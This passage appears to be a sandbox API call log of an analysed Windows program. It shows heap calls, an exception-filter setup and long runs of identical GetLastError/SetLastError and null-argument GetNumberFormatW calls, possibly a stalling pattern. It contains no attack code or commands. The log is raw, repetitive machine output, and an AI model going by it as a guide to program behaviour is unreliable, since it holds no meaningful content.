RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0x46) returned 0x672d10 [0037.630] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x673578 | out: hHeap=0x660000) returned 1 [0037.630] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0x80) returned 0x672d60 [0037.630] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0037.630] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0x800) returned 0x672de8 [0037.630] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x405c62) returned 0x0 [0037.631] RtlSizeHeap (HeapHandle=0x660000, Flags=0x0, MemoryPointer=0x672d60) returned 0x80 [0037.631] RtlSizeHeap (HeapHandle=0x660000, Flags=0x0, MemoryPointer=0x672d60) returned 0x80 [0037.631] RtlSizeHeap (HeapHandle=0x660000, Flags=0x0, MemoryPointer=0x672d60) returned 0x80 [0037.631] RtlSizeHeap (HeapHandle=0x660000, Flags=0x0, MemoryPointer=0x672d60) returned 0x80 [0037.631] GetLastError () returned 0x0 [0037.631] SetLastError (dwErrCode=0x0) [0037.631] GetLastError () returned 0x0 [0037.631] SetLastError (dwErrCode=0x0) [0037.632] GetLastError () returned 0x0 [0037.632] SetLastError (dwErrCode=0x0) [0037.632] GetLastError () returned 0x0 [0037.632] SetLastError (dwErrCode=0x0) [0037.632] GetLastError () returned 0x0 [0037.632] SetLastError (dwErrCode=0x0) [0037.632] GetLastError () returned 0x0 [0037.632] SetLastError (dwErrCode=0x0) [0037.632] GetLastError () returned 0x0 [0037.632] SetLastError (dwErrCode=0x0) [0037.632] GetLastError () returned 0x0 [0037.632] SetLastError (dwErrCode=0x0) [0037.632] GetLastError () returned 0x0 [0037.632] SetLastError (dwErrCode=0x0) [0037.632] GetLastError () returned 0x0 [0037.632] SetLastError (dwErrCode=0x0) [0037.632] GetLastError () returned 0x0 [0037.632] SetLastError (dwErrCode=0x0) [0037.632] GetLastError () returned 0x0 [0037.632] SetLastError (dwErrCode=0x0) [0037.632] GetLastError () returned 0x0 [0037.632] SetLastError (dwErrCode=0x0) [0037.632] GetLastError () returned 0x0 [0037.632] SetLastError (dwErrCode=0x0) [0037.632] GetLastError () returned 0x0 [0037.632] SetLastError (dwErrCode=0x0) [0037.632] GetLastError () returned 0x0 [0037.632] SetLastError (dwErrCode=0x0) [0037.632] GetLastError () returned 0x0 [0037.632] SetLastError (dwErrCode=0x0) [0037.632] GetLastError () returned 0x0 [0037.632] SetLastError (dwErrCode=0x0) [0037.632] GetLastError () returned 0x0 [0037.633] SetLastError (dwErrCode=0x0) [0037.633] GetLastError () returned 0x0 [0037.633] SetLastError (dwErrCode=0x0) [0037.633] GetLastError () returned 0x0 [0037.633] SetLastError (dwErrCode=0x0) [0037.633] GetLastError () returned 0x0 [0037.633] SetLastError (dwErrCode=0x0) [0037.633] GetLastError () returned 0x0 [0037.633] SetLastError (dwErrCode=0x0) [0037.633] GetLastError () returned 0x0 [0037.633] SetLastError (dwErrCode=0x0) [0037.633] GetLastError () returned 0x0 [0037.633] SetLastError (dwErrCode=0x0) [0037.633] GetLastError () returned 0x0 [0037.633] SetLastError (dwErrCode=0x0) [0037.633] GetLastError () returned 0x0 [0037.633] SetLastError (dwErrCode=0x0) [0037.633] GetLastError () returned 0x0 [0037.633] SetLastError (dwErrCode=0x0) [0037.633] GetLastError () returned 0x0 [0037.633] SetLastError (dwErrCode=0x0) [0037.633] GetLastError () returned 0x0 [0037.633] SetLastError (dwErrCode=0x0) [0037.633] GetLastError () returned 0x0 [0037.633] SetLastError (dwErrCode=0x0) [0037.633] GetLastError () returned 0x0 [0037.633] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.634] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.634] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.634] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.634] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.634] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.634] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.634] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.634] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.634] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.634] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.634] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.635] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.635] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.635] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.635] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.635] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.635] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.635] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.635] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.635] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.635] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.635] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.635] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.635] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.635] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.635] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.635] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.635] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.635] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.635] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.635] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.635] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.635] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.635] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.635] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.635] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.635] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.635] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.635] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.635] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.635] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.635] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.635] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.635] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.635] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.635] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.635] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.635] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.636] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.636] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.636] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.636] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.636] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.636] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.636] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.636] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.636] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.636] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.636] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.636] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.636] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.636] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.636] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.636] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.636] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.636] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.636] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.636] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.636] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.636] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.636] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.636] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.636] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.636] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.636] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.636] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.636] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.636] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.636] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.636] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.636] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.636] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.636] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.636] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.636] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.636] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.637] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.637] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.637] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.637] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.637] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.637] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.637] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.637] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.637] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.637] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.637] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.637] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.637] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.637] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.637] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.637] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.637] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.637] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.637] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.637] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.637] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.637] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.637] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.637] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.637] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.637] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.637] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.637] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.637] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.637] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.637] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.637] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.637] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.637] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.637] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.637] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.637] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.637] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.637] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.637] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.638] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.638] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.638] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.638] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.638] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.638] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.638] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.638] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.638] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.638] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.638] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.638] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, 